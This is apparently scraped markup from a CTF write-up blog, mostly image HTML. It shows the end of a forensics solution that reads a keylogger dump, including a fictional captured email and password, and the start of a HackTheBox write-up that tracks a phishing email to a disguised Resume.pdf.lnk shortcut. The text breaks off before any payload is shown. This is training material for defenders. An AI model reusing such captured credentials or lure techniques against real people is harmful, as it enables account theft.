https://substackcdn.com/image/fetch/$s_!y42Z!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 848w, https://substackcdn.com/image/fetch/$s_!y42Z!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 1272w, https://substackcdn.com/image/fetch/$s_!y42Z!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!y42Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png" width="1456" height="192" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:192,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!y42Z!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 424w, https://substackcdn.com/image/fetch/$s_!y42Z!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 848w, https://substackcdn.com/image/fetch/$s_!y42Z!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 1272w, https://substackcdn.com/image/fetch/$s_!y42Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. What is the URL the user navigated to:</strong></p><p>Found in a keylogger log:</p><p>drive.google.comEnter\r\nselene|Shift|@rangers.eldoria.comEnter\r\nclip-mummify-proofs</p><p>This shows the user navigating to:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!k9bV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!k9bV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 424w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 848w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 1272w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!k9bV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png" width="996" height="414" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:414,&quot;width&quot;:996,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!k9bV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 424w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 848w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 1272w, https://substackcdn.com/image/fetch/$s_!k9bV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48548a2a-7cb1-4c88-9d1c-00b5fd732494_996x414.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>6. What is the password of <a href="mailto:selene@rangers.eldoria.com">selene@rangers.eldoria.com</a>:</strong></p><p>Same keylog entry shows the password being typed after the email:</p><p>clip-mummify-proofs</p><p>Typed out character-by-character across multiple lines &#8212; classic keylogger dump.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7ZyD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7ZyD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 424w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 848w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 1272w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7ZyD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png" width="908" height="47" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:47,&quot;width&quot;:908,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7ZyD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 424w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 848w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 1272w, https://substackcdn.com/image/fetch/$s_!7ZyD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f4dbd88-1525-4a55-8524-e8e4af1a0320_908x47.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>&#129504; Final Thoughts</strong></p><p>This challenge was unique in that <strong>automated tools like Volatility and GDB didn't help</strong>. Instead, <strong>manual strings analysis saved the day</strong>. It&#8217;s a great reminder that when tools fail, <strong>a trained human eye</strong> (and a bit of patience) is often the best tool of all.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: A New Hire]]></title><description><![CDATA[Cyber Apocalypse 2025]]></description><link>https://www.byteberzerker.com/p/hackthebox-a-new-hire</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-a-new-hire</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Tue, 25 Mar 2025 21:26:39 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!QxKX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>&#128737;&#65039; CTF Write-Up: A New Hire</strong></p><p><strong>&#129534; Challenge Prompt</strong></p><p>The Royal Archives of Eldoria have recovered a mysterious document&#8212;an old resume once belonging to Lord Malakar before his fall from grace. At first glance, it appears to be an ordinary record of his achievements as a noble knight, but hidden within the text are secrets that reveal his descent into darkness.</p><p><strong>&#128193; Step 1: Download and Extract</strong></p><p>We begin by downloading and extracting the provided archive. Inside, we find a <strong>.eml file</strong>, indicating it's an email message&#8212;likely from Microsoft Outlook.</p><p><strong>&#128236; Step 2: Analyze the EML File</strong></p><p>We throw the file into <strong>eml_analyzer</strong>, a tool for parsing .eml messages. It reveals <strong>a domain and port</strong> pointing to a hosted PHP file.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QxKX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QxKX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 424w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 848w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 1272w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QxKX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png" width="1456" height="618" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:618,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!QxKX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 424w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 848w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 1272w, https://substackcdn.com/image/fetch/$s_!QxKX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd27bf296-12db-457e-b7fc-346a49a6d5e7_1606x682.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#127760; Step 3: Investigate the Host</strong></p><p>Instead of resolving hostnames, we go directly to the <strong>IP, port, and path</strong> given in the message. Visiting the link in a browser, we begin inspecting for anything suspicious.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2qee!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2qee!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 424w, https://substackcdn.com/image/fetch/$s_!2qee!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 848w, https://substackcdn.com/image/fetch/$s_!2qee!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 1272w, https://substackcdn.com/image/fetch/$s_!2qee!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2qee!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png" width="1456" height="522" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:522,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2qee!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 424w, https://substackcdn.com/image/fetch/$s_!2qee!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 848w, https://substackcdn.com/image/fetch/$s_!2qee!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 1272w, https://substackcdn.com/image/fetch/$s_!2qee!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2eaaaa4-42de-41a0-9e2e-fdddca9a136a_2553x916.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#128196; Step 4: Hidden in Plain Sight</strong></p><p>Clicking <strong>&#8220;View Full Resume&#8221;</strong> takes us to a new file path&#8212;something like:</p><p>/documents/Resume.pdf.lnk</p><p>Interesting! This .lnk is a Windows shortcut file. We download it for further inspection.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7JJR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7JJR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 424w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 848w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 1272w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7JJR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png" width="1315" height="654" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:654,&quot;width&quot;:1315,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7JJR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 424w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 848w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 1272w, https://substackcdn.com/image/fetch/$s_!7JJR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3e6095c-c97f-4dbf-83bc-9c393b82ce42_1315x654.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" 